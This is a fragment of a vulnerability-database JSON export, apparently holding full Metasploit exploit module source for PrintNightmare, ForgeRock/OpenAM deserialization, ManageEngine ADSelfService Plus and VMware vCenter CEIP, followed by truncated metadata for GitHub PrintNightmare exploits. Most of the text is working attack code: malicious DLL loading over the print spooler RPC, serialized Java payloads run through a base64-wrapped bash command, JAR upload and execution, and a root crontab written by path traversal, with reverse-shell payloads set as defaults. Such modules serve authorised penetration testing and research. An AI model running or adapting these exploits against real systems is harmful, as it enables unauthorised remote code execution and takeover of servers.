add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n 
return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#(unknown)\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n 
driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: 
\"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as 
PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-09T16:06:09", "description": "This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. 
This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus is susceptible to the same issue.\n", "cvss3": {}, "published": "2021-07-02T21:05:39", "type": "metasploit", "title": "ForgeRock / OpenAM Jato Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2023-02-08T15:20:32", "id": "MSF:EXPLOIT-MULTI-HTTP-CVE_2021_35464_FORGEROCK_OPENAM-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/cve_2021_35464_forgerock_openam/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',\n 'Description' => %q{\n This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and\n access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s\n implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a\n vulnerable endpoint. 
Successful exploitation yields code execution on the target system as the service user.\n\n This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus\n is susceptible to the same issue.\n },\n 'Author' => [\n 'Michael Stepankin', # Original Discovery and PoC\n 'bwatters-r7', # Msf module\n 'Spencer McIntyre', # All of the Help\n 'jheysel-r7' # Check Method\n ],\n 'References' => [\n ['CVE', '2021-35464'],\n ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],\n ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']\n ],\n 'DisclosureDate' => '2021-06-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path', '/openam'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),\n 'vars_post' => {\n 'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))\n }\n )\n if res.nil?\n CheckCode::Unknown(\"The target server didn't respond!\")\n elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')\n CheckCode::Appears\n else\n CheckCode::Safe\n end\n end\n\n def execute_command(cmd, _opts = {})\n 
cmd_encapsulated = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),\n 'vars_post' => {\n 'jato.pageSession' => Base64.urlsafe_encode64(\"\\x00\" + ysoserial_payload)\n }\n )\n unless res && res.code == 302\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T21:26:07", "description": "This module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-24T01:05:09", "type": "metasploit", "title": "ManageEngine ADSelfService Plus CVE-2021-40539", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T16:44:59", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n 
['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; 
filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. 
CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. 
CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n 
unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-03-27T21:17:11", "description": "# PrintNightmare (CVE-2021-1675)\n\nThis Zeek script detects succe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T16:44:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T16:56:12", "id": "3399B834-8492-5C0C-AA14-7F120BA37AF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:37:24", "description": "# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-18T12:17:12", "id": "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:13", "description": "## Kritische Sicherheitsl\u00fccke\n### PrintNightmare CVE-2021-1675, ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-05T03:00:36", "id": 
"0263BC36-BEB1-519B-965B-52D9E6AB116F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:32:50", "description": "# PrintNightmare\n\nHere is a project that will help to fight agai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T07:55:42", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-09-15T06:40:48", "id": "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "href": "", "cvss": {"score": 9.3, 